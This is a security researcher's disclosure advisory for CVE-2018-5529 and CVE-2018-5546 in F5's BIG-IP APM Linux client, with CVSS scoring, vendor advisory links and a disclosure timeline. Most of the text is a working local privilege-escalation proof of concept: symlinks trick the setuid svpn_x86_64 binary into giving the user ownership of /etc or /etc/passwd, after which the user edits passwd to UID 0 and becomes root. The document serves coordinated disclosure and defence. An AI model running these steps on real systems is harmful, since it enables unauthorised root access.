vulnerabilities/F5/CVE-2018-5529.txt

Title: F5 BIG-IP APM client for Linux and macOS vulnerability

Author: Rich Mirch

CVE: CVE-2018-5529 (incomplete fix), CVE-2018-5546

Vendor Advisory: https://support.f5.com/csp/article/K52171282 (CVE-2018-5529)
                 https://support.f5.com/csp/article/K54431371 (CVE-2018-5546)

Description

The svpn_x86_64 binary included in the F5 Linux CLI Edge Client package
changes the ownership and permissions of several files and directories
under $HOME/.F5Networks which allows local unprivileged users to obtain
ownership of arbitrary files via vectors involving creation of a directory
and a file under that directory, and later replacing that directory or
file with a symlink.


Notes:

1. PoC provided for Linux however macOS is also vulnerable. The svpn binary
is named differently and stored in a different directory on macOS.

2. The policyserver component is also vulnerable to a similar attack against
the $HOME/Library/Logs/F5Networks/policyserver.log file on macOS.


CVSS

Vector:   CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C
Base:     7.8
Temporal: 7.0


Test Environment

OS:     CentOS 64-bit release 6.9 (latest patches as of 2018-04-12)
Kernel: 2.6.32-696.23.1.el6.x86_64
ISO:    apmclients-7160.2018.118.2335-4172.0.iso


Proof Of Concept

Two distinct arbitrary file takeover vulnerabilities exist in the
/usr/local/lib/F5Networks/SSLVPN/svpn_x86_64 binary which is setuid root.

1. Privileges are not dropped prior to chown()/chmod() of the
$HOME/.F5Networks directory.

2. Privileges are not dropped prior to chown()/chmod() of the
$HOME/.F5Networks/svpn.log file.


Note: A low privileged account named user1 is used for all test cases.

[user1@localhost ~]$ id
uid=500(user1) gid=500(user1) groups=500(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-
s0:c0.c1023


################################################################################
# Test case 1 - take ownership of a directory
#               /etc via $HOME/.F5Networks
################################################################################

[Step 1] Create a symlink from /etc to $HOME/.F5Networks

[user1@localhost ~]$ ln -s /etc /home/user1/.F5Networks
[user1@localhost ~]$ ls -ld /etc /home/user1/.F5Networks
drwxr-xr-x. 64 root  root  4096 Apr 12 19:29 /etc
lrwxrwxrwx.  1 user1 user1    4 Apr 12 19:38 /home/user1/.F5Networks -> /etc


[Step 2] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64

[user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64


[Step 3] Show that user1 is now the owner of /etc.

[user1@localhost ~]$ ls -ld /etc
drwxr-xr-x. 64 user1 user1 4096 Apr 12 19:39 /etc


[Step 4] Modify /etc/passwd and change UID/GID to 0 for user1.

[user1@localhost ~]$ cd /etc
[user1@localhost etc]$ mv passwd passwd.old
[user1@localhost etc]$ cp passwd.old passwd
[user1@localhost etc]$ ls -ld /etc/passwd
-rw-r--r--. 1 user1 user1 929 Apr 12 19:40 /etc/passwd

[user1@localhost etc]$ sed -i.orig -e 's/:500:500/:0:0/' /etc/passwd
[user1@localhost etc]$ diff -u /etc/passwd.orig /etc/passwd
--- /etc/passwd.orig    2018-04-12 19:40:02.132987696 -0500
+++ /etc/passwd    2018-04-12 19:41:15.484988778 -0500
@@ -18,4 +18,4 @@
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
-user1:x:500:500::/home/user1:/bin/bash
+user1:x:0:0::/home/user1:/bin/bash


[Step 5] Execute /bin/su - user1 and become root.

[user1@localhost etc]$ /bin/su - user1
Password:
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023


################################################################################
# Test case 2 - take ownership of a file
#               /etc/passwd via $HOME/.F5Networks/svpn.log
################################################################################

[Step 1] Create $HOME/.F5Networks.

[user1@localhost ~]$ mkdir -m 755 /home/user1/.F5Networks


[Step 2] Display permissions of /etc/passwd and attempt to write to it.

[user1@localhost ~]$ ls -ld /etc /etc/passwd
drwxr-xr-x. 64 root root 4096 Apr 12 19:41 /etc
-rw-r--r--.  1 root root  929 Apr 12 19:40 /etc/passwd
[user1@localhost ~]$ echo test> /etc/passwd
-bash: /etc/passwd: Permission denied
[user1@localhost ~]$


[Step 3] Create a symlink from /etc/passwd to /home/user1/.F5Networks/svpn.log.

[user1@localhost ~]$ ln -s /etc/passwd /home/user1/.F5Networks/svpn.log
[user1@localhost ~]$ ls -ld .F5Networks/svpn.log /etc/passwd
-rw-r--r--. 1 root  root  929 Apr 12 19:40 /etc/passwd
lrwxrwxrwx. 1 user1 user1  11 Apr 12 22:02 .F5Networks/svpn.log -> /etc/passwd


[Step 4] Backup /etc/passwd.

[user1@localhost ~]$ cp -p /etc/passwd passwd.orig


[Step 5] Display contents of /etc/passwd.

[user1@localhost ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
user1:x:500:500::/home/user1:/bin/bash


[Step 6] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64. user1 is
now the owner of /etc/passwd.

[user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[user1@localhost ~]$ ls -ld /etc/passwd
-rw-r--r--. 1 user1 user1 2385 Apr 12 22:14 /etc/passwd


[Step 7] Display contents of /etc/passwd. Notice the log file is appended to the file.

[user1@localhost ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
user1:x:500:500::/home/user1:/bin/bash
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,  =====================================
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,  Location: /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,  Version: "7160.2018.0118.1"
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,  Locale: C
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,  =====================================
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,
2018-04-12,22:14:15:121, 2479,2479,svpn, 48,,,, current log level = 63
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 91, ------------------,
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 92, [main], getuid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 93, [main], getgid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 94, [main], geteuid, 0
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 95, [main], getegid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 96, [main], HOME, /home/user1
2018-04-12,22:14:15:121, 2479,2479,svpn, 48, , 98, [main], version, 7160.2018.0118.1
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 100, ------------------,
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 107, [main], Current sigprocmask: 0xffff8a00
2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 33, ReadProperties(), reading of initial configuration timed
out
2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 116, [main], Reading settings property failed


[Step 8] Create a new /etc/passwd file and change UID and GID to 0.

[user1@localhost ~]$ sed -e 's/:500:500/:0:0/' < passwd.orig > /etc/passwd


[Step 9] Execute /bin/su - user1 and become root.

[user1@localhost ~]$ su - user1
Password:
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost ~]#


Timeline:

2018-04-16: Reported to vendor
2018-04-18: Vendor confirmed PoC. Sent to F5 PD for further review
2018-04-25: Vendor confirmed vulnerability and requested embargo
2018-07-12: Vendor released fix in 7.1.7 and advisory K52171282. CVE-2018-5529
2018-07-17: Notified vendor that the fix in 7.1.7 did not properly resolve the issue
2018-07-17: Vendor acknowledged receipt of the incomplete fix report
2018-07-17: Vendor confirmed vulnerability
2018-08-16: Vendor released fix in 7.1.7.1 and advisory K54431371. CVE-2018-5546